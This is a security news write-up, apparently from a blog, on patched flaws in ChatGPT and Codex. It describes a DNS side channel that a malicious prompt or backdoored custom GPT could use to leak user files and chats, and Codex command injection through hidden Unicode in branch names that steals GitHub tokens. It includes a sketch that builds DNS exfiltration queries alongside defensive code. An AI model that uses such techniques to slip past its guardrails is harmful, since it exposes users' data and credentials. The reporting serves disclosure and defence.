OpenAI Patches ChatGPT Data Exfiltration and Codex GitHub Token Vulnerabilities

  • Mar 30

Key Findings


  • Check Point discovered a critical vulnerability in ChatGPT that allowed attackers to exfiltrate user data, uploaded files, and conversation history without detection or consent

  • The flaw exploited a hidden DNS-based communication channel in the Linux runtime environment, bypassing all visible AI guardrails

  • OpenAI patched the ChatGPT vulnerability on February 20, 2026, with no evidence of malicious exploitation

  • BeyondTrust Phantom Labs identified a command injection vulnerability in OpenAI's Codex that allowed attackers to steal GitHub OAuth tokens using hidden Unicode characters in branch names

  • The Codex flaw affected the ChatGPT website, Codex SDK, and developer extensions, potentially compromising entire enterprise repositories

  • OpenAI addressed the Codex vulnerability through a hotfix on December 23, 2025, and confirmed the fixes complete on February 5, 2026


Background


OpenAI's ChatGPT and Codex have become integral tools in both consumer and enterprise environments, with users uploading increasingly sensitive information for analysis and code generation. These AI systems are designed with multiple security layers to prevent unauthorized data sharing and direct outbound network requests. However, the discoveries by Check Point and BeyondTrust revealed fundamental gaps in how these platforms isolate data and validate user input, raising concerns about the default security posture of AI systems handling sensitive enterprise data.


ChatGPT Data Exfiltration Through DNS Side Channel


Check Point researchers uncovered a vulnerability that weaponized the Linux runtime environment used by ChatGPT for code execution and data analysis. Rather than attacking the AI model directly, the flaw exploited a hidden DNS-based communication path that existed at the infrastructure level. By encoding information into DNS requests, attackers could bypass ChatGPT's safeguards, which operated under the assumption that the execution environment was completely isolated and incapable of sending data outward.


The vulnerability could be triggered through a single malicious prompt, turning an ordinary conversation into a covert exfiltration channel. A backdoored custom GPT could silently harvest user messages and uploaded files without any warning or user approval dialog. The lack of visible data transfer warnings meant the leakage remained largely invisible from the user's perspective.
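To illustrate the mechanics of a DNS side channel in general terms: data can be smuggled out of an "isolated" environment by encoding it into the hostnames of DNS lookups, which often pass through egress controls that block HTTP. The sketch below only builds the query names, it performs no network activity; `attacker.example` is a placeholder domain, and the chunking scheme is illustrative, not the one Check Point observed.

```python
import base64


def encode_for_dns(data: bytes, attacker_domain: str, chunk_size: int = 30) -> list[str]:
    """Split data into DNS-label-sized chunks and embed each in a query name.

    Base32 is used because DNS labels are case-insensitive and limited to
    letters, digits, and hyphens; each label may hold at most 63 characters.
    """
    encoded = base64.b32encode(data).decode().rstrip("=").lower()
    chunks = [encoded[i:i + chunk_size] for i in range(0, len(encoded), chunk_size)]
    # Resolving a name like "<seq>-<chunk>.attacker.example" delivers the chunk
    # to the attacker's authoritative nameserver even if HTTP egress is blocked.
    return [f"{seq}-{chunk}.{attacker_domain}" for seq, chunk in enumerate(chunks)]


queries = encode_for_dns(b"secret session data", "attacker.example")
```

Because each lookup looks like routine name resolution, defenders typically catch this only by monitoring for high-entropy subdomains or unusual query volume to a single domain.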


Attack Delivery Methods


Attackers could exploit this vulnerability through multiple vectors. The simplest approach involved convincing users to paste a malicious prompt by framing it as a way to unlock premium features or improve ChatGPT's performance. A more sophisticated vector involved embedding the malicious logic directly into custom GPTs, where it would execute automatically without requiring any user action beyond launching the tool.


The threat was particularly acute for enterprise environments where employees might unknowingly interact with compromised custom GPTs created by threat actors or distribute them throughout an organization.


Codex Command Injection and GitHub Token Theft


The Codex vulnerability stemmed from improper input sanitization when processing GitHub branch names during task execution. BeyondTrust researchers discovered that attackers could inject arbitrary commands through the branch name parameter by exploiting a Unicode character known as the Ideographic Space (U+3000). This special character appears as a normal space to the human eye but allowed hidden commands to execute in the background.


When developers viewed what appeared to be a standard branch named "main," malicious instructions could be running simultaneously. The injected commands could then coerce Codex into revealing its GitHub OAuth tokens in plain text, giving attackers the same credential access that Codex used to authenticate with GitHub repositories.
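The underlying defense is strict input validation: branch names that reach a shell should be checked against an explicit allowlist rather than scanned for known-bad characters. The sketch below is a minimal illustration of that idea, not OpenAI's actual fix; the allowlist regex and the example names are assumptions for demonstration.

```python
import re
import unicodedata

# Conservative allowlist: ASCII letters, digits, and a few safe separators.
SAFE_BRANCH = re.compile(r"^[A-Za-z0-9._/-]+$")


def validate_branch_name(name: str) -> str:
    """Reject branch names containing anything outside a strict ASCII allowlist.

    U+3000 IDEOGRAPHIC SPACE renders like an ordinary space, so a name such as
    "main\u3000&& curl ..." can look like "main" in a UI while smuggling an
    extra shell command past a naive blocklist check.
    """
    if not SAFE_BRANCH.match(name):
        bad = [
            f"U+{ord(c):04X} {unicodedata.name(c, '?')}"
            for c in name
            if not SAFE_BRANCH.match(c)
        ]
        raise ValueError(f"unsafe branch name, disallowed characters: {bad}")
    return name


validate_branch_name("feature/fix-123")        # passes
# validate_branch_name("main\u3000&& id")      # raises ValueError
```

Even with validation in place, branch names should be passed to subprocesses as argument lists rather than interpolated into shell strings, so a missed character can never become a command boundary.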


Scale and Impact of Codex Vulnerability


The flaw affected multiple attack surfaces including the ChatGPT website, Codex SDK, and various developer extensions. If an attacker modified a project's default branch to include the hidden Unicode injection, any developer opening the repository would have their credentials automatically exfiltrated. The compromised tokens provided attackers with full control over a developer's code repositories and, by extension, access to shared enterprise environments.


Beyond cloud-based attacks, researchers discovered that Codex stores sensitive login data locally in an auth.json file on developers' machines. An attacker with access to a developer's workstation could extract these tokens to move laterally through an entire organization's GitHub infrastructure, potentially compromising intellectual property and customer data across multiple repositories.
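For defenders, one practical mitigation is auditing locally stored credential files for overly permissive file modes and plaintext secrets. The sketch below assumes a `~/.codex/auth.json` location and a flat JSON layout purely for illustration; the actual path and schema may differ by installation.

```python
import json
import stat
from pathlib import Path

# Assumed default location for illustration; verify against your install.
AUTH_PATH = Path.home() / ".codex" / "auth.json"


def audit_auth_file(path: Path) -> list[str]:
    """Flag weak permissions and plaintext fields in a local credential file."""
    findings: list[str] = []
    if not path.exists():
        return findings
    mode = stat.S_IMODE(path.stat().st_mode)
    # Credential files should be 0o600: readable only by the owning user.
    if mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append(f"{path} is readable by group/other (mode {oct(mode)})")
    try:
        for key in json.loads(path.read_text()):
            findings.append(f"plaintext field stored: {key}")
    except (json.JSONDecodeError, OSError):
        pass
    return findings
```

Tightening the file to `0o600` limits exposure to the local user, but a token stolen from a compromised workstation still works remotely, so short token lifetimes and scoped permissions matter as much as file hygiene.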


Response and Remediation Timeline


Check Point followed responsible disclosure practices and worked with OpenAI to address the ChatGPT vulnerability before public disclosure. OpenAI deployed a patch on February 20, 2026. For Codex, BeyondTrust reported the flaw on December 16, 2025, prompting OpenAI to release a hotfix one week later on December 23. The company continued hardening defenses and by January 30, 2026, had implemented stronger protections for shell commands and restricted token access. OpenAI formally classified the issue as a "Critical Priority 1" vulnerability on February 5, 2026, confirming fixes were complete.


Broader Security Implications


These vulnerabilities highlight a critical gap in AI security architecture. Both flaws exploited assumptions about data isolation and input validation that AI vendors took for granted. Security researchers emphasized that organizations cannot rely on AI tools being secure by default and must implement independent security layers to counter prompt injections and unexpected AI behavior.


The issues also coincided with reports of malicious browser extensions engaging in prompt poaching, silently siphoning ChatGPT conversations without user consent. Security experts warned that such extensions could enable identity theft, targeted phishing, and unauthorized access to intellectual property and customer data in enterprise settings.


Sources


  • https://thehackernews.com/2026/03/openai-patches-chatgpt-data.html

  • https://hackread.com/openai-codex-vulnerability-steal-github-tokens/

  • https://letsdatascience.com/news/openai-patches-chatgpt-exfiltration-bug-and-codex-vulnerabil-1ea8b9ba

  • https://x.com/TheCyberSecHub/status/2038680989682348294

  • https://www.cypro.se/2026/03/30/openai-patches-chatgpt-data-exfiltration-flaw-and-codex-github-token-vulnerability/

© 2025 by Explain IT Again. Powered and secured by Wix
